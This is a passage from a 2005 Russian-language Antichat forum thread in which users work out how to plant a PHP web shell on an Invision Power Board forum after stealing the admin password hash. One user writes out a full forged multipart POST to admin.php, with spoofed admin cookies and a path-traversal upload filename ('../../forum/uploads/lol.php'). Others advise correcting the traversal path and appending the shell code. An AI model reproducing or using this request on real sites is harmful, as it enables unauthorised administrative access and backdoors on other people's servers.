ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 25.03.2005, 05:38
Аватар для link
link
Новичок
Регистрация: 15.01.2005
Сообщений: 7
Провел на форуме:
2605

Репутация: 0
По умолчанию

Рзве текст шела влезет в инеткряк?
 
Ответить с цитированием

  #12  
Старый 25.03.2005, 05:48
Аватар для link
link
Новичок
Регистрация: 15.01.2005
Сообщений: 7
Провел на форуме:
2605

Репутация: 0
По умолчанию

Да стати когда ставиш относительный путь типа "../../my.php" то он файл не создает, хотя директория доступна на запись, сам выставлял права, т.е. естил на своем форуме.
 
Ответить с цитированием

  #13  
Старый 27.03.2005, 23:53
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию

Цитата:
Сообщение от link  
Рзве текст шела влезет в инеткряк?
Свободно...
 
Ответить с цитированием

  #14  
Старый 10.04.2005, 04:53
Аватар для XJIOP
XJIOP
Познающий
Регистрация: 23.03.2005
Сообщений: 40
Провел на форуме:
44404

Репутация: 13
Отправить сообщение для XJIOP с помощью ICQ
По умолчанию

народ получил хэш захожу под админом все ок, а в admin.php нужен пароль, перебрал кучу словарей кароче кирдык, как можно в админку залесть зная хэш админa?
 
Ответить с цитированием

  #15  
Старый 10.04.2005, 05:02
Аватар для XJIOP
XJIOP
Познающий
Регистрация: 23.03.2005
Сообщений: 40
Провел на форуме:
44404

Репутация: 13
Отправить сообщение для XJIOP с помощью ICQ
По умолчанию

с этим скриптом выдает ошибку

id='description'>You must have administrative access to successfully log into the Invision Board Admin CP.<br>Please enter your forums username and password below<br><br><span style='color:red;font-weight:bold'>Could not retrieve session record</span></div> <!--IPB.ERROR--> <!--IPB.MESSAGE-->

прально ли я понял?

POST http*://site.com/forum/admin.php?adsess=ид сесия? HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http*://site.com/forum/admin.php?ид сесия?&act=op&code=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=ид админа;
pass_hash=тут понято;

-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

ид сесия?
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../forum/uploads/lol.php"
Content-Type: application/octet-stream

нада еще что то менять? и дальше где исходник шела нада с ковычками? или просто (исходинк)?
 
Ответить с цитированием

  #16  
Старый 10.04.2005, 10:11
Аватар для (-=util=-)
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
Провел на форуме:
307649

Репутация: 67
Отправить сообщение для (-=util=-) с помощью ICQ
По умолчанию

мдя =)
Этот путь указан неверно.
../../forum/uploads/lol.php

../../ <-это означает что файл заливается на 2 дириктории вниз (блеже к корневой)
допустим www.lol.ru/dir1/dir2/dir3/admin.php
находясь в админпхп чтобы залить файл в dir2 надо указать путь ../../upload_file
чтобы в dir1 то ../../../upload_file
Вот так если я нечего непутаю.

Второе у тебя нехватает самого аплоада

<% echo("php script") %>
-----------------------------7d43942c405bc--
 
Ответить с цитированием

  #17  
Старый 10.04.2005, 10:26
Аватар для BlackPrince
BlackPrince
Познающий
Регистрация: 13.10.2004
Сообщений: 82
Провел на форуме:
102923

Репутация: 13
Отправить сообщение для BlackPrince с помощью ICQ
По умолчанию

без расшифровки пароля залить шелл не получится. Ты админский пароль расшифровал?
 
Ответить с цитированием

  #18  
Старый 10.04.2005, 10:45
Аватар для (-=util=-)
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
Провел на форуме:
307649

Репутация: 67
Отправить сообщение для (-=util=-) с помощью ICQ
По умолчанию

для этого он и подделывает запрос. чтобы хэш нерасшифровывать. тут может помешать только чмод.
 
Ответить с цитированием

  #19  
Старый 10.04.2005, 11:11
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию

Цитата:
Сообщение от (-=util=-)  
для этого он и подделывает запрос. чтобы хэш нерасшифровывать. тут может помешать только чмод.
Нет, расшифрованный админский пароль все равно нужен. Иначе ты adsess не узнаешь
 
Ответить с цитированием

  #20  
Старый 10.04.2005, 13:03
Аватар для (-=util=-)
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
Провел на форуме:
307649

Репутация: 67
Отправить сообщение для (-=util=-) с помощью ICQ
По умолчанию

ну ептель тогда нет смысла париться с этими паками :\
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Залить файл через шелл insidex АнтиАдмин 9 24.12.2005 02:05
залить шелл через ipb 2.0.4 alakazam Форумы 4 16.11.2005 22:08
Как залить шелл через PhPBB SheFF Форумы 5 29.11.2004 01:25
Как залить шелл через IPB форум, при отсутствии ftp? bbmz Форумы 1 26.11.2004 18:15



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ